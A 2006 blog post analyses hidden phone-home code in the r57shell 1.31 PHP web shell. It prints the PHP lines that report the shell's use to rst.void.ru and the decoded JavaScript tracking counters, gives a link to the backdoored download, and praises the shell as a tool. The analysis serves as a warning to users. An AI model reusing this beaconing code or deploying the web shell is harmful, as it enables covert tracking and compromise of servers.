Deception within Obfuscation A few days ago "full_disclosure full_disclosure" posted on [Full Disclosure] about the present malware in r57shell. As some of you may know; r57shell is a PHP script that is often used by attackers and penetration testers alike in remote and local inclusion scenarios for the sake of having a fully-packed PHP shell interface. When using scripts the likes of r57shell one must always keep in mind that authors of such tools are usually intelligent beings who are capable of smuggling obscure means of deception.

Lets look at a few ways the r57shell developers can spot your attacks, and, even attack the servers you have successfully attacked in accordance to r57shell version 1.31:

1) Lines 1504 to 1510:

if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}

In human translation:

a) If the 'cmd' variable is empty via the POST method then
b) Set an array of '127', '192', '172', and '10' to the 'serv' variable ('127', '192', '172', and '10' refer to first bit of loopback and internal addresses)
c) Set the variable 'addr' with the separated bits of an the servers IP address
d) Remove any periods in the 'version' variable and set that new value to the 'current_version' variable
e) If the first bit of the IP address is not in the array then:
f) Load an image from http://rst.void.ru/r57shell_version/version.php and set the variable 'img' to "1" and version to "131"
g) Read the contents of http://rst.void.ru/r57shell_version/version.php and set the variable 'version' to '131'
h) That is all

In essence the above doesn't look too suspicious but be forewarned--it is quite dangerous. In exhibit 'f' your browser is instructed to view an image from the rst.void.ru web server. The variable 'img' is set to "1" as to almost declare to the developers of r57shell that the incoming IP address is of the attacker. In other words--the developers of r57shell know who attacked what. In exhibit 'g' the server is instructed to read a file off of the rst.void.ru web server. It does not set the variable 'img' to "1" which may indicate that the incoming server is the vulnerable box. That gives the r57shell developers the opportunity to take over the server you are attacking.

To give you an idea of the bad intentions of the code above you have to look at exhibits 'b', 'c', and 'e' as they determine whether or not your server is worthwhile. Internal IP and loopback addresses are useless to an attacker who seems interested in a quick and easy hack. The intent of accessing the vulnerable servers IP address is clear--but what is the intent of the developers knowing your IP address? Blackmale? Accusation? Research purposes? The unknown factor is what is dangerous.

2) The original issue posted on Full Disclosure originally is in lines 1469-1487, 1593 to 1595, and 2204. I am not going to paste the contents of 1469 to 1487 as its a big chunk of base64 code, but the following is its human translation:

a) Set the variable 'c1' with: <script language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r=
"+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie=
"hotlog=1; path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled
()?"Y":"N")</script><script language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen
.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen
.pixelDepth)</script><script language="javascript1.3">hotlog_js="1.3"</script><script language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a href='http://click.hotlog.ru/?81606' target='_top'><img "+" src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 width=1 height=1 alt=1></a>")</script><noscript><a href=http://click.hotlog.ru/?81606 target=_top><imgsrc="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" border=0width="1" height="1" alt="HotLog"></a></noscript>

b) Set the variable 'c2' with: <!--LiveInternet counter--><script language="JavaScript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';'+Math.random()+
'" alt="liveinternet.ru: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è ïîñåòèòåëåé çà 24 ÷àñà" '+
'border=0 width=0 height=0></a>')//--></script><!--/LiveInternet-->

c) After the 'c1' and 'c2' variables are set, a third variable on line 1593 called 'f' is then set. It starts the variable with a <br> and appends the base64 decoded values (the javascript code above). And finally the code is executed on line 2204 at the end of the code. The code looks like:
echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
Take note of ".$f" as that is your malicious code being added to the echo string.

d) On line 1592 you see
if(empty($c1)||empty($c2)) { die(); }
The scripts makes a check to see if its been discovered--if the 'c1' and 'c2' variables are empty then the script dies.

Clearly it seems the authors of r57shell have attempted, successfully, to spread malware within the form of malware itself.

The backdoored code is still hosted at: http://rst.void.ru/download/r57shell.txt.gz

To their credit though, it's a great tool regardless. Just need to yank out the bad stuff :)

» digg it  ¶ 9/12/2006 08:45:00 AM